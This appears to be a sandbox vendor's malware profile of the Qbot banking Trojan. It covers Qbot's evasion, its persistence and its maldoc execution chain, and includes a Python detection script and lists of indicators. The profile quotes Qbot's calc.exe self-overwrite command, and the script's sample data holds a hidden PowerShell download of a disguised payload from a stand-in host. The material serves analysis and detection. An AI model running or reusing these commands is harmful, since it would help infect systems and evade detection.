Qbot is a banking Trojan, malware designed to collect banking information from its victims. Qbot targets organizations mostly in the US and is equipped with a variety of sophisticated evasion and info-stealing functions, as well as worm-like functionality and a strong persistence mechanism.

Type: Trojan
Origin: Unknown
First seen: 1 January, 2009
Last seen: 20 October, 2020
Also known as: Pinkslipbot, QakBot, Quakbot
Global rank: 19
Week rank: 21
Month rank: 12
IOCs: 2314

What is Qbot?

Qbot, also known as QakBot, Pinkslipbot and Quakbot, is a banking Trojan: malware designed to steal banking credentials, online banking session data, personal details of the victim and any other banking-related information.

Although early versions of Qbot were spotted as far back as 2009, the Trojan has been well maintained by its creators. Today it continues to be active, features worm-like abilities to spread over networks, supports advanced web-injection techniques and has a persistence mechanism that some researchers consider one of the best in its class. Additionally, the Trojan has anti-VM, anti-debug and anti-sandbox functionality that makes research and analysis quite difficult.

Furthermore, Qbot is polymorphic, meaning it can change itself even after it is installed on an endpoint. The Trojan constantly modifies its files on disk, and newer versions of Qbot continuously cycle through command and control servers.

The combination of these functions makes Qbot a highly dangerous piece of malware. Since it first surfaced, Qbot has been used in a number of successful attacks on organizations and government bodies and has infected tens of thousands of machines.

General description of Qbot

Qbot is deployed in targeted attacks against businesses. With this Trojan, the attackers go after the bank accounts of organizations, or of private users who access their personal online banking from corporate networks, by hijacking the victim's banking sessions.

The Trojan uses man-in-the-browser functionality to perform web injections, allowing it to alter what victims see on the banking website when browsing from an infected machine. Interestingly, while most malware that uses this technique carries the web-injection code in its configuration file, Qbot fetches the code from an attacker-controlled domain at runtime.

Another trait that sets Qbot apart from other Trojans is its worm-like functionality. Qbot can copy itself to shared drives and spread over the network, either on its own or after receiving a command from the command and control server. Together with a highly developed persistence mechanism that uses registry Run keys and scheduled tasks, these traits make eradicating Qbot from an infected network very difficult. The Trojan is designed to survive system reboots and launches itself automatically when the system starts again.

This infamous persistence functionality allegedly led to the compromise of sensitive information in two government organizations in Massachusetts in 2011, while the worm-like behaviour helped Qbot infiltrate thousands of machines and build a botnet of over 1,500 devices as a result of that attack.

Most of the targets Qbot goes after are US-based organizations; only about twenty percent are located outside the United States. Although, apart from government offices, most attacks have been directed at the banking, tech and healthcare industries, there is no hard evidence that the attackers are aiming at specific sectors. This means that a business in any industry can be hit by Qbot.

It is also important to note that the malware is operated by an advanced cybergang. Qbot attacks have been appearing on the radar of security researchers periodically, with phases of high activity and intervals when attacks would completely stop. This behavior is likely a way to avoid attracting too much attention from law enforcement and also allows attackers to tweak and improve the malware during their time off.

The group behind Qbot is also notorious for pushing out new, modified samples of the malware at an astonishing rate. They repack and re-scramble the code on a daily basis, making identification of the malware by signature-based anti-virus software unreliable.

Unfortunately, the identities of people behind Qbot are unknown, but it is widely believed that the cyber gang is based somewhere in Eastern Europe.

Qbot malware analysis

The video below, recorded in the ANY.RUN interactive malware hunting service, shows the execution process of Qbot.


Figure 1: the graph of processes created by the sample, as recorded by the ANY.RUN interactive malware hunting service

Qbot execution process

Since Qbot mostly targets the corporate sector, its main way into a system is a malicious document. In our example, the maldoc uses a macro to start several processes, including PowerShell. Through cmd.exe the Trojan then runs a chain of commands that creates folders and temporary files, and it uses PowerShell to download the payload. Notably, the payload name is very often as simple as six identical digits or, less often, letters, and the payload frequently carries a .png extension even though it is an executable file.

Once the Trojan starts its main execution, Qbot tries to evade detection by overwriting its own dropped binary with the legitimate Windows executable calc.exe, using a command of the form: cmd.exe /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "<path to malware executable>". The ping to 127.0.0.1 serves only as a delay of roughly five seconds, and type copies the bytes of calc.exe over the file, so what a scanner or analyst later finds at that path is a clean Windows binary while the malicious code keeps running in memory. Qbot also injects into explorer.exe and adds itself to autorun for persistence.
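The execution chain above lends itself to a simple behavioural check. The following Python script is an added example written for this page, not code from ANY.RUN or from any Qbot sample: it scans process command lines for the ping-then-type self-overwrite trick and checks dropped files for an image extension that hides a PE executable or a name made of one repeated character. The process events, file contents, paths and the http://example.invalid URL are constructed for the example and mirror the chain described above rather than real telemetry.

```python
"""Flag Qbot-style execution-chain artefacts in process and file telemetry."""
import re

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"image": "WINWORD.EXE",
     "cmdline": '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
                '/n "C:\\Users\\admin\\Desktop\\invoice.doc"'},
    {"image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
                "'http://example.invalid/444444.png',"
                "'C:\\Users\\admin\\AppData\\Local\\Temp\\444444.png')"},
    {"image": "cmd.exe",
     "cmdline": 'cmd.exe /c ping.exe -n 6 127.0.0.1 & type "C:\\Windows\\System32\\calc.exe" '
                '> "C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Zulycjadyc\\ytfovlym.exe"'},
    # Benign use of ping as a sleep: must not trigger the overwrite rule.
    {"image": "cmd.exe", "cmdline": "cmd.exe /c ping -n 3 localhost"},
]

# Constructed (path, first bytes) pairs standing in for files seen on disk.
SAMPLE_FILES = [
    ("C:\\Users\\admin\\AppData\\Local\\Temp\\444444.png", b"MZ\x90\x00" + b"\x00" * 60),
    ("C:\\Users\\admin\\Pictures\\logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
]

# ping.exe -n <N> 127.0.0.1 & type "<...>calc.exe" > "<target>"
OVERWRITE_RE = re.compile(
    r'ping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*&\s*'
    r'type\s+"?[^"&>]*calc\.exe"?\s*>\s*"?(?P<target>[^"]+?)"?\s*$',
    re.IGNORECASE,
)

IMAGE_EXTENSIONS = (".png", ".jpg", ".jpeg", ".gif", ".bmp")


def is_calc_overwrite(cmdline):
    """Return the path being overwritten with calc.exe, or None if no match."""
    m = OVERWRITE_RE.search(cmdline)
    return m.group("target") if m else None


def looks_like_pe(data):
    """PE files start with the DOS 'MZ' magic regardless of their extension."""
    return data[:2] == b"MZ"


def suspicious_image_download(path, data):
    """True for a file with an image extension whose content is a PE executable."""
    return path.lower().endswith(IMAGE_EXTENSIONS) and looks_like_pe(data)


def repeated_char_name(path):
    """True if the file name without extension is one character repeated six times."""
    stem = path.replace("\\", "/").rsplit("/", 1)[-1].rsplit(".", 1)[0]
    return re.fullmatch(r"(\w)\1{5}", stem) is not None


def scan(events, files):
    """Run all three checks and return a list of (rule, detail) findings."""
    findings = []
    for ev in events:
        target = is_calc_overwrite(ev["cmdline"])
        if target:
            findings.append(("calc_overwrite", target))
    for path, data in files:
        if suspicious_image_download(path, data):
            findings.append(("pe_with_image_extension", path))
        if repeated_char_name(path):
            findings.append(("repeated_char_name", path))
    return findings


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS, SAMPLE_FILES):
        print(f"{rule}: {detail}")
```

The overwrite rule keys on the combination of a loopback ping delay and a redirect of calc.exe's bytes into another path, so a plain ping used as a sleep does not fire; the MZ check is the quick way to confirm that a ".png" fetched by PowerShell is really the executable payload.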

Qbot distribution

Qbot uses multiple attack vectors to infect victims. The malware uses email spam and phishing campaigns, as well as vulnerability exploits to infiltrate its targets. One of the more recent versions of the malware was observed being distributed by a dropper.

The dropper that installs Qbot has a delayed-execution function. After the dropper is downloaded onto a target machine it waits around fifteen minutes before dropping the payload, most likely to outlast the analysis window of automated sandboxes and avoid detection.

How to detect Qbot using ANY.RUN?

The Qbot Trojan creates files that let analysts identify it with a high degree of certainty. To detect Qbot, open the "Files" tab in the lower part of the task window and look at the created folders. If you see folders with random-looking names such as "Zulycjadyc" and "imtaykad" under the C:\Users\admin\AppData\Roaming\Microsoft\ directory, together with an .exe or .dat file with a name like "ytfovlym", as shown in the figure below, you are almost certainly looking at Qbot. Note that the exact names differ from sample to sample; it is the pattern of random alphabetic names in that location, not the specific strings, that is the indicator.


Figure 2: Detecting Qbot by local files

Conclusion

Security researchers successfully reversed a sample of Qbot in a 2020 investigation. Because they managed to pinpoint a command and control server, they could gauge the true scale of the attack: an active Qbot botnet of over 2,000 computers.

If there was any doubt that Qbot is an extremely serious threat, this should clear it. Advanced web injections, sophisticated anti-analysis techniques, worm-like functions and an experienced cybergang that constantly updates the malware are a dangerous cocktail.

For security researchers it is extremely important to analyze malware like Qbot: code obfuscation makes research complicated, and every investigation has the potential to uncover data that helps businesses avoid attacks or identify and eradicate this Trojan faster. While Qbot evades dynamic analysis in some automated sandboxes through the delayed execution of its dropper and other tricks, interactive sandboxes such as the ANY.RUN malware hunting service are not so easily fooled.

ANY.RUN presents a good opportunity to perform dynamic analysis on this malware from a secure online environment and share your findings with fellow researchers in our public malware database.

IOCs

IP addresses
47.44.217.98
217.162.149.212
70.124.29.226
72.204.242.138
23.235.198.21
71.187.170.235
2.50.131.64
80.14.209.42
81.133.234.36
96.227.127.13
47.146.32.175
95.77.223.148
67.60.113.253
68.116.193.239
77.31.120.194
67.250.30.121
146.200.250.36
73.232.165.200
207.255.161.8
Hashes
48cfc44c4abb999b0a945919f4c15ccba517693222891915bb035872bfaca42b
5ce88567997551f0ff7e9bdff09ac6082e74ac95e14f46c7baec4c1da0488d6d
884852c74e05d43e1e7ef7cfb62aedc1bf29b4b137bb0d1180cea5c2640aceed
3b6ded24b70dd1dc3d4340b38a99690b489f52a21b2d8a53d2bf03e5cfe3cfef
1bf07d1621549da8acfa152bb4c4f53c8a3e9d1b5ce83c1ebd58b076784163f9
e4f8edfcba2f1bdca8af5c069158dcfb9d09129f3e0f4ffd0f702762d4c6b73f
c35f8737cb5e3df8f4da37b1e96af1c3f0edf407e36fe1a95e841ec2d63b75da
73c162b12ffe77df91cc648b204abe81b764561a0ca05d88eb7a5a008f179be5
7968e439b30c14367919bd4844ab1e1775cde9f57160650c37522bcd614fed88
07381325a3582428cc48e43512d272b45021741e646923a3d9b4d0c2b7251448
a736088b7b7d4f12d2aac3cc83ec05abdc9e4019b1b7daf9c848d98b4f8cbd88
79c04627cbd66b0c38d779a824a97dbb31c0cb1df807eb001013793a184328ed
432c6c97506c8296468e94dfdbc8bd9b81fa47ebfdf40f67cb1f96c51cdc12da
9f03172a982600f8f3fcba80c959f2aa117a3d5a3f62637487d3af58cf75b932
41bd1ec1598fe270ab75f325da57cfc75395a6a7a3bdf8f00bc22c68f0e37ef8
1ea355cdd4574702623527ac4d86e8f9def61a13aa8945521ff509453cc3dce1
679b57409ead1786eebce343009140054ed4dada25fe61c140a409634e5af875
8e9a0182ecdb430c8e89b54e97549b0eed4a29c9062ccb9c366e3b56b863c89b
7365dfc3f17367f55e5b676be38798e49e8cb9cdbb1c368deb586677d9d4423a
c8dcfc1fb7d3ce28b0ebf0d81c1af511c8446a1882c3148f2f21239f64c05279
Domains
ffoeefsheuesihfo.ru
isns.net
majul.com
elx01.knas.systems
awskohg.wecloudapi.com
secure.jsc0nten1maker.com
errors.newdatastatsserv.com
pumaskill.com
bagelbath.com
my.kankuedu.org
server.ncha.uk
somesub.louisianaquickdivorce.com
dmad.info
riifndisojdoj.in
cdn.ssstatic.net
ipruoamdmsngktvvhxluztsm.info
futureinterest.org
qwerty.tastywieners.com
dendy.oshkoshrugby.org
type.tastywieners.com
